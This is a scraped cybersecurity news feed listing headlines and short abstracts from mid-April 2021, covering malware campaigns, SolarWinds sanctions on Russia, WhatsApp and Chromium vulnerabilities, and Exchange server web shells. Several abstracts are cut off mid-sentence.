Hackers Used 100,000 Google Sites to Install SolarMarket RAT on Victims' Devices Full Text
Abstract
Several professionals who had searched the internet for professional forms such as invoices, questionnaires, and receipts were lured into downloading a RAT...Cyber Security News
April 16, 2021 – Hacker
Lazarus E-Commerce Attackers Also Targeted Cryptocurrency Full Text
Abstract
Hackers with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to Group-IB.Careers Info Security
April 16, 2021 – General
Consumers worry about the cybersecurity of connected vehicles Full Text
Abstract
The HSB poll by Zogby Analytics found that 37 percent of consumers who responded were somewhat or very concerned about the cyber security and safety of connected and automated vehicles.Help Net Security
April 16, 2021 – Botnet
Mirai code re-use in Gafgyt Full Text
Abstract
Uptycs' threat research team recently detected several variants of the Linux-based botnet malware family "Gafgyt," some of which re-used Mirai code. Uptycs' threat research team recently detected several variants of the Linux-based botnet malware...Security Affairs
April 16, 2021 – Vulnerabilities
Severe Bugs Reported in EtherNet/IP Stack for Industrial Systems Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) Thursday issued an advisory warning of multiple vulnerabilities in the OpENer EtherNet/IP stack that could expose industrial systems to denial-of-service (DoS) attacks, data leaks, and remote code execution. All OpENer commits and versions prior to February 10, 2021, are affected, although there are no known public exploits that specifically target these vulnerabilities. The four security flaws were discovered and reported to CISA by researchers Tal Keren and Sharon Brizinov from operational technology security company Claroty. Additionally, a fifth security issue identified by Claroty was previously disclosed by Cisco Talos (CVE-2020-13556) on December 2, 2020. "An attacker would only need to send crafted ENIP/CIP packets to the device in order to exploit these vulnerabilities," the researchers said. CVE-2020-13556 concerns an out-of-bounds write vulnerability in the Ethernet/IP server that couldThe Hacker News
April 16, 2021 – Covid-19
Update: The COVID-19 Vaccine’s Global Cold Chain Continues to Be a Target Full Text
Abstract
The expanded scope of precision targeting includes key organizations likely underpinning the transport, warehousing, storage, and ultimate distribution of vaccines, according to IBM Security X-Force.Security Intelligence
April 16, 2021 – Hacker
Trickbot Actors Target Slack and BaseCamp Users Full Text
Abstract
Customized scam messages designed to deploy malware loader.Infosecurity Magazine
April 16, 2021 – Malware
HackBoss malware poses as hacker tools on Telegram to steal digital coins Full Text
Abstract
The authors of a cryptocurrency-stealing malware are distributing it over Telegram to aspiring cybercriminals under the guise of free malicious applications.BleepingComputer
April 16, 2021 – Malware
Lazarus BTC Changer. Back in action with JS sniffers redesigned to steal crypto Full Text
Abstract
Group-IB observed the North Korea-linked Lazarus APT group stealing cryptocurrency using a never-before-seen tool. In the last five years, JavaScript sniffers have grown into one of the most dangerous threats for e-commerce businesses. The simple...Security Affairs
April 15, 2021 – Phishing
Celsius email system breach leads to phishing attack on customers Full Text
Abstract
Cryptocurrency rewards platform Celsius Network has disclosed a security breach exposing customer information that led to a phishing attack.BleepingComputer
April 15, 2021 – Criminals
EtterSilent Maldoc Builder - The Hot Selling Cake in Underground Forums Full Text
Abstract
According to Intel 471, some cybercriminal groups are leveraging Ettersilent maldoc builder to bypass Windows Defender, Windows AMSI, and top email services including Gmail.Cyware Alerts - Hacker News
April 15, 2021 – General
Hillicon Valley: Biden administration sanctions Russia for SolarWinds hack, election interference Full Text
Abstract
The Biden administration on Thursday levied sweeping sanctions against Russia in retaliation for its involvement in the SolarWinds hack and interfering in U.S. elections, which lawmakers hailed as a positive step, but will likely serve to increase tensions between the two nations.The Hill
April 15, 2021 – Government
US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack Full Text
Abstract
The U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with "high confidence" to government operatives working for Russia's Foreign Intelligence Service (SVR). "Russia's pattern of malign behaviour around the world – whether in cyberspace, in election interference or in the aggressive operations of their intelligence services – demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security," the U.K. government said in a statement. To that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for "undermining the conduct of free and fair elections and democratic institutions" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services. The comThe Hacker News
April 15, 2021 – Policy and Law
US Imprisons “Sadistic” Sextortionist Full Text
Abstract
Cyberstalker who threatened to kill teenage victim if they didn't have sex with him gets custodial sentence.Infosecurity Magazine
April 15, 2021 – Government
Sanctioning Russia for SolarWinds: What Normative Line Did Russia Cross? Full Text
Abstract
The United States has just sanctioned various Russian entities in express response to the SolarWinds Orion exploit campaign. But what normative line, if any, is the U.S. saying that Russia crossed?Lawfare
April 15, 2021 – Government
US Gov sanctions Russia and expels 10 diplomats over SolarWinds hack Full Text
Abstract
The U.S. and UK attributed with "high confidence" the recently disclosed supply chain attack on SolarWinds to Russia's Foreign Intelligence Service (SVR). The U.S. and U.K. attributed with "high confidence" the supply chain attack on SolarWinds to operatives...Security Affairs
April 15, 2021 – Business
Hack The Box looks to expand in America, add new functions to ‘hacking experiences’ suite Full Text
Abstract
Today, Hack The Box has 90 employees across the globe and the U.S. team makes up 10% of the global workforce – a number the company intends to double in the U.S. by end-of-year. While the location for the U.S. office has not been confirmed, the company aims for the office to create a strong base for its U.S. business operations.SCMagazine
April 15, 2021 – Government
Biden Races to Shore Up Power Grid Against Hacks Full Text
Abstract
A 100-day race to boost cybersecurity will rely on incentives rather than regulation, the White House said.Threatpost
April 15, 2021 – Business
Mozilla drops Firefox support on Amazon Fire TV Full Text
Abstract
This month, Amazon has announced plans to phase out support for the Mozilla Firefox web browser app on its Fire TV product line. The company has decided to no longer support the Mozilla Firefox browser in a bid to promote its Amazon Silk web browser app to customers, effective at the end of this month.BleepingComputer
April 15, 2021 – Phishing
Key Characteristics and Geographic Associations of Phishing Emails Full Text
Abstract
An analysis by Barracuda and Columbia University revealed that the majority of phishing emails originate from countries in Eastern Europe, Central America, the Middle East, and Africa.Cyware Alerts - Hacker News
April 15, 2021 – Government
Intelligence leaders face sharp questions during House worldwide threats hearing Full Text
Abstract
The nation's top intelligence leaders faced sharper political questions during a House hearing on global security threats, with lawmakers as focused on rehashing issues from the Trump era as future threats.The Hill
April 15, 2021 – Government
Sanctions Escalate US–Russia Tensions Full Text
Abstract
Russia hints at confrontation after being sanctioned by US for hacking and election interference.Infosecurity Magazine
April 15, 2021 – Criminals
Cyber thieves move $760 million stolen in the 2016 Bitfinex heist Full Text
Abstract
Over $760 million worth of Bitcoin stolen from the cryptocurrency exchange Bitfinex in 2016 has been moved to new accounts. More than $760 million worth of Bitcoin, stolen from Asian cryptocurrency exchange Bitfinex in 2016, was moved on Wednesday...Security Affairs
April 15, 2021 – Vulnerabilities
What to do when a bug bounty request sounds more like extortion Full Text
Abstract
Experts advise? Try to force the gray hat researcher into a prisoner’s dilemma.SCMagazine
April 15, 2021 – Government
US government confirms Russian SVR behind the SolarWinds hack Full Text
Abstract
The United States government is formally accusing the Russian government of the SolarWinds supply-chain attack that gave hackers access to the network of multiple U.S. agencies and private tech sector companies.BleepingComputer
April 15, 2021 – Ransomware
The Tale of a New Ransomware Cartel Full Text
Abstract
Though it's normal for victims to remain unaware of how their stolen data is being put to use by cybercriminals, there are gangs in ransomware cartels who have made millions of dollars exploiting stolen data.Cyware Alerts - Hacker News
April 15, 2021 – Government
New US sanctions further chill Biden-Putin relations Full Text
Abstract
The U.S. and Russia entered a new phase of heightened tensions Thursday after President Biden announced punishing sanctions over cyberattacks, election interference and threats against U.S. soldiers in Afghanistan.The Hill
April 15, 2021 – Policy and Law
Arrest Made Over California City Data Breach Full Text
Abstract
One Huntington Park financial official arrested and others placed on leave following data breach.Infosecurity Magazine
April 15, 2021 – Privacy
Should NSA monitor your networks? Director Nakasone says no, ‘I’m not seeking legal authorities’ Full Text
Abstract
At a pair of hearings on Wednesday and Thursday, the National Security Agency and U.S. Cyber Command director again pushed back against a brewing Senate plan for the NSA to monitor domestic networks for foreign hackers.SCMagazine
April 15, 2021 – Vulnerabilities
NSA: Top 5 vulnerabilities actively abused by Russian govt hackers Full Text
Abstract
A joint advisory from the U.S. National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) warns that the Russian Foreign Intelligence Service (SVR) is exploiting five vulnerabilities in attacks against U.S. organizations and interests.BleepingComputer
April 15, 2021 – Criminals
Cyber thieves move $760 million stolen in the 2016 Bitfinex heist Full Text
Abstract
In August 2016, the Asia-based exchange Bitfinex suffered a security breach that resulted in the theft of 120,000 Bitcoin; the incident had serious repercussions on the Bitcoin price, which dropped significantly (about 20%) after the breach.Security Affairs
April 15, 2021 – Outage
Uni of Hertfordshire Suffers Cyber-Attack That Takes Down its Entire IT Network Full Text
Abstract
The attack has led to online classes being cancelled.Infosecurity Magazine
April 15, 2021 – Government
As US takes sweeping action against Russia for years of hacking, industry skeptical of impact Full Text
Abstract
Anticipated for months, the Biden administration unveiled a sweeping set of sanctions and other actions against the Russian government, as well as private individuals and a number of Russian tech and defense companies. While applauded in cyber circles, some remain skeptical that the efforts will deter Moscow’s cyberespionage efforts.SCMagazine
April 15, 2021 – Business
Cybersecurity VC Funding Hit Record in 2020 With $7.8 Billion Invested Full Text
Abstract
Despite the coronavirus pandemic, 2020 was a record year in terms of venture capital funding for cybersecurity companies, with more than $7.8 billion invested, according to a new report from business information platform Crunchbase.Security Week
April 15, 2021 – Vulnerabilities
Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Credential Harvesting Full Text
Abstract
Six days after installing the webshell, the actor used the installed webshell to run PowerShell commands to gather information from the local server and the Active Directory and stole credentials from the compromised Exchange server.Palo Alto Networks
April 15, 2021 – Vulnerabilities
Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks Full Text
Abstract
The NSA, the CISA, and the FBI jointly released a Cybersecurity Advisory, “Russian SVR Targets U.S. and Allied Networks,” today to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities.FBI
April 15, 2021 – Hacker
Lazarus E-Commerce Attackers Also Targeted Cryptocurrency Full Text
Abstract
Hackers with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to the cybersecurity firm Group-IB.Gov Info Security
April 15, 2021 – Attack
A Casino Gets Hacked Through a Fish-Tank Thermometer Full Text
Abstract
That was the lesson learned a few years ago from the operators of a North American casino. According to a 2018 Business Insider report, cybersecurity executive Nicole Eagan of security firm Darktrace told the story while addressing a conference.Entrepreneur
April 15, 2021 – Government
Biden administration sanctions Russia for SolarWinds hack, election interference Full Text
Abstract
The Biden administration on Thursday announced sanctions against Russia for its involvement in a recent major cyber espionage operation against the U.S., foreign influence operations around U.S. elections, and other concerns.The Hill
April 15, 2021 – Hacker
Attackers Target ProxyLogon Exploit to Install Cryptojacker Full Text
Abstract
Threat actors targeted compromised Exchange servers to host malicious Monero cryptominer in an “unusual attack,” Sophos researchers discovered.Threatpost
April 15, 2021 – Vulnerabilities
Siemens Releases Several Advisories for ‘NAME:WRECK’ Vulnerabilities Full Text
Abstract
Siemens released a total of 14 new advisories on Tuesday, including five describing the impact and remediations for the NAME:WRECK vulnerabilities disclosed on the same day.Security Week
April 15, 2021 – Attack
University of Hertfordshire hit by cyberattack Full Text
Abstract
The University of Hertfordshire was targeted by a cyberattack which resulted in the university's entire IT network being taken down, as well as all access to cloud-based services being blocked.IT Security Guru
April 15, 2021 – Business
Cado Security locks in $10M for its cloud-native digital forensics platform Full Text
Abstract
The funding for London-based Cado is being led by Blossom Capital, with existing investors Ten Eleven Ventures also participating, among others. As another signal of demand, this Series A is coming only six months after Cado raised its seed round.TechCrunch
April 15, 2021 – Vulnerabilities
Another Critical Vulnerability Patched in SAP Commerce Full Text
Abstract
SAP announced the release of 14 new security notes and 5 updates to previously released notes. The only new Hot News note released with this round of patches addresses a critical vulnerability in SAP Commerce.Security Week
April 15, 2021 – Denial Of Service
Hundreds of Thousands of Spam Emails Flood LinkedIn Users’ Inboxes Full Text
Abstract
Users of the employment-oriented online service are being targeted with an assortment of phishing emails and scams in an attempt to hijack their LinkedIn accounts or promote fake LinkedIn email leads.Bitdefender
April 15, 2021 – Vulnerabilities
For the second time in a week, a Google Chromium zero-day released online Full Text
Abstract
A new Chromium zero-day remote code execution exploit has been released on Twitter this week, like the previous one that affects current versions of Google Chrome, Microsoft Edge, and likely other Chromium-based browsers.Security Affairs
April 15, 2021 – Policy and Law
Republican lawmakers reintroduce bill to ban TikTok on federal devices Full Text
Abstract
Sen. Josh Hawley (R-Mo.) led a group of Senate Republicans on Thursday in reintroducing legislation to ban the use of social media app TikTok on federal government devices, citing potential national security concerns.The Hill
April 15, 2021 – Vulnerabilities
1-Click Hack Found in Popular Desktop Apps — Check If You’re Using Them Full Text
Abstract
Multiple one-click vulnerabilities have been discovered across a variety of popular software applications, allowing an attacker to potentially execute arbitrary code on target systems. The issues were discovered by Positive Security researchers Fabian Bräunlein and Lukas Euler and affect apps like Telegram, Nextcloud, VLC, LibreOffice, OpenOffice, Bitcoin/Dogecoin Wallets, Wireshark, and Mumble. "Desktop applications which pass user supplied URLs to be opened by the operating system are frequently vulnerable to code execution with user interaction," the researchers said. "Code execution can be achieved either when a URL pointing to a malicious executable (.desktop, .jar, .exe, …) hosted on an internet accessible file share (nfs, webdav, smb, …) is opened, or an additional vulnerability in the opened application's URI handler is exploited." Put differently, the flaws stem from an insufficient validation of URL input that, when opened with the help of the uThe Hacker News
April 15, 2021 – Vulnerabilities
April 2021 Security Patch Day fixes a critical flaw in SAP Commerce Full Text
Abstract
April 2021 Security Patch Day includes 14 new security notes and 5 updates to previously released notes, one of them fixes a critical issue in SAP Commerce. April 2021 Security Patch Day includes 14 new security notes and 5 updates to previously released...Security Affairs
April 15, 2021 – Government
Months after hack, US poised to announce sanctions on Russia Full Text
Abstract
The Biden administration is preparing to announce sanctions and the expulsion of diplomats from the U.S. in response to a massive Russian hacking campaign that breached vital federal agencies, as well as for election interference.AP News
April 15, 2021 – Malware
Malware Variants: More Sophisticated, Prevalent and Evolving in 2021 Full Text
Abstract
A malicious program intended to cause havoc with IT systems, malware, is becoming more and more sophisticated every year. The year 2021 is no exception, as recent trends indicate that several new variants of malware are making their way into the world of cybersecurity. While smarter security solutions are popping up, modern malware still eludes and challenges cybersecurity experts. The evolution of malware has infected everything from personal computers to industrial units since the 70s. Cybersecurity firm FireEye's network was attacked in 2020 by hackers with the most sophisticated form of hacking, i.e., supply chain. This hacking team demonstrated world-class capabilities to disregard security tools and forensic examination, proving that anybody can be hacked. Also, the year 2021 is already witnessing a bump in COVID-19 vaccine-related phishing attacks. Let's take a look at the trends that forecast an increase in malware attacks: COVID-19 and Work-from-Home (WFH)The Hacker News
April 15, 2021 – Breach
Indian Supply-Chain Giant Bizongo Exposed 643GB of Sensitive Data Full Text
Abstract
Bizongo, an online packaging marketplace has suffered a data leak in which the company left highly sensitive customer information unsecured and potentially exposed to hackers and other malicious individuals.Hackread
April 15, 2021 – Breach
ParkMobile Breach Leaves 21M User Data Exposed Full Text
Abstract
The account information of 21 million customers of ParkMobile, a very popular mobile parking app from North America, is now being sold online due to a data breach. The information includes a whole range of sensitive details including phone numbers.Heimdal Security
April 15, 2021 – Policy and Law
Europe’s Data Protection Guardians Green Light EU-UK Data Flows Full Text
Abstract
EDPB recommends accepting Commission's adequacy decisions.Infosecurity Magazine
April 15, 2021 – Criminals
YIKES! Cybercriminals flood the Internet with 100,000 malicious PDF documents Full Text
Abstract
Cybercriminals are resorting to search engine poisoning techniques to lure business professionals into seemingly legitimate Google sites that install a Remote Access Trojan (RAT) capable of carrying out a wide range of attacks. The attack works by leveraging searches for business forms such as invoices, templates, questionnaires, and receipts as a stepping stone toward infiltrating the systems. Users attempting to download the alleged document templates are redirected, without their knowledge, to a malicious website that hosts the malware. "Once the RAT is on the victim's computer and activated, the threat actors can send commands and upload additional malware to the infected system, such as ransomware, a credential stealer, a banking trojan, or simply use the RAT as a foothold into the victim's network," researchers from eSentire said in a write-up published on Tuesday. The cybersecurity firm said it discovered over 100,000 unique web pages that contain popThe Hacker News
April 15, 2021 – Policy and Law
Man Gets 10 Years for Multimillion-Dollar Medicare Fraud Scheme Full Text
Abstract
Complex conspiracy involved doctors, labs and telemarketing firmInfosecurity Magazine
April 15, 2021 – Hacker
Global Attacker Dwell Time Drops to Just 24 Days Full Text
Abstract
Ransomware spike and better threat detection play a partInfosecurity Magazine
April 15, 2021 – Vulnerabilities
Critical WhatsApp Flaw Let Attackers Hack the Victim Device Remotely Full Text
Abstract
CENSUS identified two vulnerabilities in the popular WhatsApp messenger app for Android. The first of these was independently reported to Facebook and was...Cyber Security News
April 15, 2021 – General
Well-funded, organized attacks require strategic counter-defense strategies Full Text
Abstract
The adversary is well funded, persistent, and highly technical; therefore, it is important for security leaders to accept that there’s no one vendor or technology that can defend against supply chain attacks.Cyberscoop
April 15, 2021 – General
CISOs Must Focus on People and Technologies Amid Rising Attacks Full Text
Abstract
How should CISOs respond to increased attacks in the past year?Infosecurity Magazine
April 15, 2021 – Vulnerabilities
For the second time in a week, a Google Chromium zero-day released online Full Text
Abstract
For the second time in a week, a Chromium zero-day remote code execution exploit code has been released on Twitter, with multiple browsers impacted. A new Chromium zero-day remote code execution exploit has been released on Twitter this week, like the previous...Security Affairs
April 15, 2021 – Government
Victorian government earmarks AU$30m to lift hospital cyber capabilities Full Text
Abstract
The Victorian government plans to invest a total of AU$30 million to upgrade and modernize the IT infrastructure of 28 of the state's hospitals and health services in a bid to guard against further cyber-attacks.ZDNet
April 15, 2021 – Attack
NBA’s Houston Rockets probing cyber attack, working closely with FBI Full Text
Abstract
The Houston Rockets are investigating a cyber attack that attempted to install ransomware on the basketball team’s internal systems, and the organization is working closely with the FBI, team officials said.Reuters
April 15, 2021 – Government
CISA Urges Caution for Security Researchers Targeted in Attack Campaign Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) is cautioning cybersecurity researchers to keep their guard up amid a wave of attacks targeting this particular group.Dark Reading
April 14, 2021 – General
Hillicon Valley: Intel leaders push for breach notification law | Coinbase goes public Full Text
Abstract
Key U.S. intelligence leaders on Wednesday called on Congress to pass breach notification laws in the wake of major cybersecurity incidents. Meanwhile, Ireland’s privacy agency launched an investigation into a Facebook data leak, and two leading House Republicans raised concerns about new Chinese tech companies posing a threat to national security.The Hill
April 14, 2021 – General
The DoJ’s Microsoft mitigation: Real results, with a few hypothetical concerns Full Text
Abstract
The move is being hailed as a landmark use of a new authority. But some in the cybersecurity community point to a lack of any clear standard for when and how government may hack private systems.SCMagazine
April 14, 2021 – Vulnerabilities
Security Bug Allows Attackers to Brick Kubernetes Clusters Full Text
Abstract
The vulnerability is triggered when a cloud container pulls a malicious image from a registry.Threatpost
April 14, 2021 – Government
House Republicans raise concerns about new Chinese tech companies Full Text
Abstract
Two leading Republicans on the House Homeland Security Committee on Wednesday raised concerns about security and privacy threats posed by emerging Chinese tech companies, specifically zeroing in on electronics group Xiaomi.The Hill
April 14, 2021 – Vulnerabilities
WhatsApp flaws could have allowed hackers to remotely hack mobile devices Full Text
Abstract
WhatsApp addressed two security vulnerabilities in its app for Android that could have been exploited to remotely hack the victim's device. WhatsApp recently addressed two security vulnerabilities in its app for Android that could have been exploited...Security Affairs
April 14, 2021 – Business
Led by cloud, cyber funding dollars flowed like water in 2020 Full Text
Abstract
2020 brought with it record levels of investment, with a combined $7.8 billion poured into cybersecurity startups. 2021 is shaping up even better, with some predicting $15 billion in investments by year end.SCMagazine
April 14, 2021 – Privacy
Intelligence leaders push for mandatory breach notification law Full Text
Abstract
The leaders of the nation’s intelligence agencies on Wednesday joined bipartisan members of the Senate Intelligence Committee in pushing for measures to encourage the private sector to report breaches and to deter malicious hackers from attacking critical infrastructure.The Hill
April 14, 2021 – Education
No more snack attacks? Mondelez hopes new security training will prevent the next ‘NotPetya’ Full Text
Abstract
Sure, APT attacks can be destructive and even deadly, but denying the world their Oreo cookies is just plain cruel. Indeed, Nikolay Betov, information security officer at Mondelez, told SC media that the event “changed everything.”SCMagazine
April 14, 2021 – Ransomware
Ransomware Attack Creates Cheese Shortages in Netherlands Full Text
Abstract
Not a Gouda situation: An attack on a logistics firm is suspected to be related to Microsoft Exchange server flaw.Threatpost
April 14, 2021 – Attack
New Jersey School Districts Investigate Cyber-Attacks Full Text
Abstract
Two Somerset County school districts suspect they were targeted by cyber-criminalsInfosecurity Magazine
April 14, 2021 – Vulnerabilities
SAP fixes critical bugs in Business Client, Commerce, and NetWeaver Full Text
Abstract
SAP's security updates for this month address multiple critical vulnerabilities. The most serious of them, rated with the highest severity score, affects the company's Business Client product.BleepingComputer
April 14, 2021 – General
Aviation Industry Lacks Cohesive Cybersecurity Approach Full Text
Abstract
World Economic Forum study calls for unified cybersecurity strategy in aviation sectorInfosecurity Magazine
April 14, 2021 – Vulnerabilities
Second Google Chrome zero-day exploit dropped on Twitter this week Full Text
Abstract
A second Chromium zero-day remote code execution exploit has been released on Twitter this week that affects current versions of Google Chrome, Microsoft Edge, and likely other Chromium-based browsers.BleepingComputer
April 14, 2021 – Policy and Law
Lawsuit Filed After Facial Recognition Tech Leads to Wrongful Arrest Full Text
Abstract
American sues Detroit officials over wrongful arrest linked to facial recognition technologyInfosecurity Magazine
April 14, 2021 – General
Intelligence leaders warn of threats from China, domestic terrorism Full Text
Abstract
Intelligence leaders warned Wednesday of growing threats from China and domestic terrorism fueled by misinformation on social media at a hearing on worldwide threats to the nation.The Hill
April 14, 2021 – Vulnerabilities
Critical Exchange Server Vulnerabilities let Attackers Execute Remote Code Full Text
Abstract
Microsoft has released security updates for vulnerabilities found in the below versions of Exchange servers on the 13th April 2021 which is...Cyber Security News
April 14, 2021 – IOT
‘Digital exhaust’ may be the solution for tracking consumer IoT devices on networks Full Text
Abstract
A technique known as radio frequency (RF) fingerprinting could be leveraged to give a unique ID to the billions of rogue IoT devices lurking within home and business networks.SCMagazine
April 14, 2021 – Privacy
Vivaldi, Brave, DuckDuckGo reject Google’s FLoC ad tracking tech Full Text
Abstract
Makers of Vivaldi and Brave web browsers have rejected Google's new privacy-preserving proposal called FLoC, which is meant to replace third-party tracking cookies across websites on browsers, including Chrome.BleepingComputer
April 14, 2021 – Vulnerabilities
Reddit takes bug bounty program public Full Text
Abstract
Reddit announced Wednesday that it is taking its bug bounty program public. The popular social news site and community forum platform has run a private program with HackerOne for the past three years, but hopes that by going public, it can more quickly address vulnerabilities, improve its defenses and keep the platform secure. “We’ve seen…SCMagazine
April 14, 2021 – Government
Wray: FBI opens investigation into China every 10 hours Full Text
Abstract
FBI Director Christopher Wray told Senate Intelligence Committee members on Wednesday that the agency is opening an investigation into various Chinese government actions every 10 hours.The Hill
April 14, 2021 – Vulnerabilities
100 Million+ Devices Affected With Critical WRECK DNS Implementation Flaws Full Text
Abstract
JSOF team together with Forescout Research Labs, have revealed a set of nine vulnerabilities related to Domain Name System (DNS) implementations, causing...Cyber Security News
April 14, 2021 – Government
Bolstering Our Nation’s Defenses Against Cybersecurity Attacks Full Text
Abstract
Shawn Henry, former Executive Assistant Director of the FBI and current CrowdStrike president of services and CSO, shares the top three cybersecurity priorities that the Biden administration needs to address.Dark Reading
April 14, 2021 – Vulnerabilities
New WhatsApp Bugs Could’ve Let Attackers Hack Your Phone Remotely Full Text
Abstract
Facebook-owned WhatsApp recently addressed two security vulnerabilities in its messaging app for Android that could have been exploited to execute malicious code remotely on the device and even compromise encrypted communications. The flaws take aim at devices running Android versions up to and including Android 9 by carrying out what's known as a "man-in-the-disk" attack that makes it possible for adversaries to compromise an app by manipulating certain data being exchanged between it and the external storage. "The two aforementioned WhatsApp vulnerabilities would have made it possible for attackers to remotely collect TLS cryptographic material for TLS 1.3 and TLS 1.2 sessions," researchers from Census Labs said today. "With the TLS secrets at hand, we will demonstrate how a man-in-the-middle (MitM) attack can lead to the compromise of WhatsApp communications, to remote code execution on the victim device and to the extraction of Noise protocol keyThe Hacker News
April 14, 2021 – Business
Thycotic and Centrify Complete Merger to Expand PAM Offerings Full Text
Abstract
The newly merged company will operate under the temporary name of ThycoticCentrifyInfosecurity Magazine
April 14, 2021 – Hacker
FireEye: 650 new threat groups were tracked in 2020 Full Text
Abstract
FireEye published its M-Trends 2021 report based on the data collected during its investigations; 650 new threat groups were tracked in 2020. FireEye published its annual report, titled M-Trends 2021, which is based on the data collected during the investigation...Security Affairs
April 14, 2021 – General
On first-ever Identity Management Day, experts detail steps to a better IAM program Full Text
Abstract
Establishing a governance structure and communicating with stakeholders are key strategies, said experts.SCMagazine
April 14, 2021 – Vulnerabilities
WhatsApp flaw lets anyone lock you out of your account Full Text
Abstract
The underlying loophole abuses a lapse in security of two independent WhatsApp processes, according to Forbes, which quoted research by Luis Márquez Carpintero and Ernesto Canales Pereña.ESET Security
April 14, 2021 – Vulnerabilities
New JavaScript Exploit Can Now Carry Out DDR4 Rowhammer Attacks Full Text
Abstract
Academics from Vrije University in Amsterdam and ETH Zurich have published a new research paper describing yet another variation of the Rowhammer attack. Dubbed SMASH (Synchronized MAny-Sided Hammering), the technique can be used to successfully trigger the attack from JavaScript on modern DDR4 RAM cards, notwithstanding extensive mitigations that have been put in place by manufacturers over the last seven years. "Despite their in-DRAM Target Row Refresh (TRR) mitigations, some of the most recent DDR4 modules are still vulnerable to many-sided Rowhammer bit flips," the researchers said. "SMASH exploits high-level knowledge of cache replacement policies to generate optimal access patterns for eviction-based many-sided Rowhammer. To bypass the in-DRAM TRR mitigations, SMASH carefully schedules cache hits and misses to successfully trigger synchronized many-sided Rowhammer bit flips." By synchronizing memory requests with DRAM refresh commands, the researchersThe Hacker News
April 14, 2021 – Covid-19
Bad Bots Could Disrupt #COVID19 Vaccine Rollout Full Text
Abstract
Scalper bots have already been cashing-in on the pandemicInfosecurity Magazine
April 14, 2021 – Government
FBI silently removed web shells planted on Microsoft Exchange servers in the US Full Text
Abstract
The FBI logged into web shells that hackers had installed on Microsoft Exchange email servers across the US and removed the malicious code used by the threat actors. A US judge granted the FBI the power to log into web shells that were injected by nation-state hackers...Security Affairs
April 14, 2021 – Malware
QBot Malware Is Making a Comeback by Replacing IcedID in Malspam Campaigns Full Text
Abstract
In the first months of the year, researchers noticed a malicious email campaign spreading weaponized Office documents that was delivering the QBot trojan, and changing the payload after a short while.Heimdal Security
April 14, 2021 – Vulnerabilities
New Vulnerability Affecting Container Engines CRI-O and Podman (CVE-2021-20291) Full Text
Abstract
Palo Alto Networks researchers have found CVE-2021-20291 in containers/storage that leads to a Denial of Service (DoS) of the container engines CRI-O and Podman when pulling a malicious image from a registry.Palo Alto Networks
April 14, 2021 – Breach
Risk startup LogicGate confirms data breach Full Text
Abstract
An email sent by LogicGate to customers earlier this month said on February 23 an unauthorized third party obtained credentials to its AWS-hosted cloud storage servers storing customer backup files for its flagship platform Risk Cloud.TechCrunch
April 14, 2021 – Government
FBI blasts away web shells on US servers in wake of Exchange vulnerabilities Full Text
Abstract
The Department of Justice revealed on Tuesday that the FBI gained authorization to remove web shells installed on compromised servers related to the Exchange vulnerabilities.ZDNet
April 14, 2021 – Solution
Microsoft Released CyberBattleSim – A Python-based Enterprise Environment Simulator Full Text
Abstract
Microsoft has recently announced the open-source availability of the Python-based enterprise environment simulator named ‘CyberBattleSim’. It is an experimental...Cyber Security News
April 14, 2021 – Malware
Cracked copies of Microsoft Office and Adobe Photoshop steal your session cookies, browser history, crypto-coins Full Text
Abstract
Cracked copies of Microsoft Office and Adobe Photoshop are stealing browser session cookies and Monero cryptocurrency wallets from tightwads who install the pirated software, Bitdefender has warned.The Register
April 14, 2021 – General
Simplify, then Add Lightness – Consolidating the Technology to Better Defend Ourselves Full Text
Abstract
One of the biggest consequences of the rapidly evolving cybersecurity threat landscape is that defenses must constantly build bigger systems to defend themselves. This leads to both more complex systems and often less communication between them. More importantly, it can lead companies to invest in disparate "best in class" components instead of finding the best fit for their needs. The constant arms race means that companies often get bigger, more powerful tools that can't handle the nuanced threats they face. For instance, in a car race, it's not often the fastest, most powerful car that wins, but the one that is more balanced, lighter, and more able to turn and react when needed. In a new live webinar, Cynet Chief Strategist Chris Roberts breaks down why the philosophy of "simpler is better" is just what cybersecurity needs (register here). The webinar will focus on how quickly cybersecurity stacks are growing and how this is not always a good thing. Companies are too focusedThe Hacker News
April 14, 2021 – Vulnerabilities
Microsoft Patches Four More Critical Exchange Server Bugs Full Text
Abstract
NSA reported the vulnerabilities as Patch Tuesday CVEs top 100Infosecurity Magazine
April 14, 2021 – Government
Sweden blames Russia for Swedish Sports Confederation hack Full Text
Abstract
The Swedish Sports Confederation organization was compromised in 2017-18 by hackers working for Russian military intelligence, officials said. The Swedish Sports Confederation is the umbrella organisation of the Swedish sports movement; it was hacked...Security Affairs
April 14, 2021 – Government
The Biden Administration’s Cybersecurity Roadmap Full Text
Abstract
The pandemic has forced state and local governments to shift so much of their operations and provision of services online, but their technology has often struggled to keep up, and even worse it has exposed their cybersecurity vulnerabilities.Nextgov
April 14, 2021 – Government
FBI Removes Web Shells from Infected Exchange Servers Full Text
Abstract
Aggressive action designed to head-off persistent security threatInfosecurity Magazine
April 14, 2021 – Business
1Password targets developers with Secrets Automation, acquisition of SecretHub Full Text
Abstract
Password specialist 1Password has acquired SecretHub, a secrets management platform aimed at IT engineers, and made a new service called Secrets Automation, previously in beta, generally available.The Register
April 14, 2021 – General
Small Kansas Water Utility System Hacking Highlights Risks Full Text
Abstract
A former Kansas utility worker has been charged with remotely tampering with a public water system’s cleaning procedures, highlighting the difficulty smaller utilities face in protecting against hackers.Security Week
April 14, 2021 – Vulnerabilities
Adobe Patches Critical Code Execution Vulnerabilities in Photoshop, Bridge Full Text
Abstract
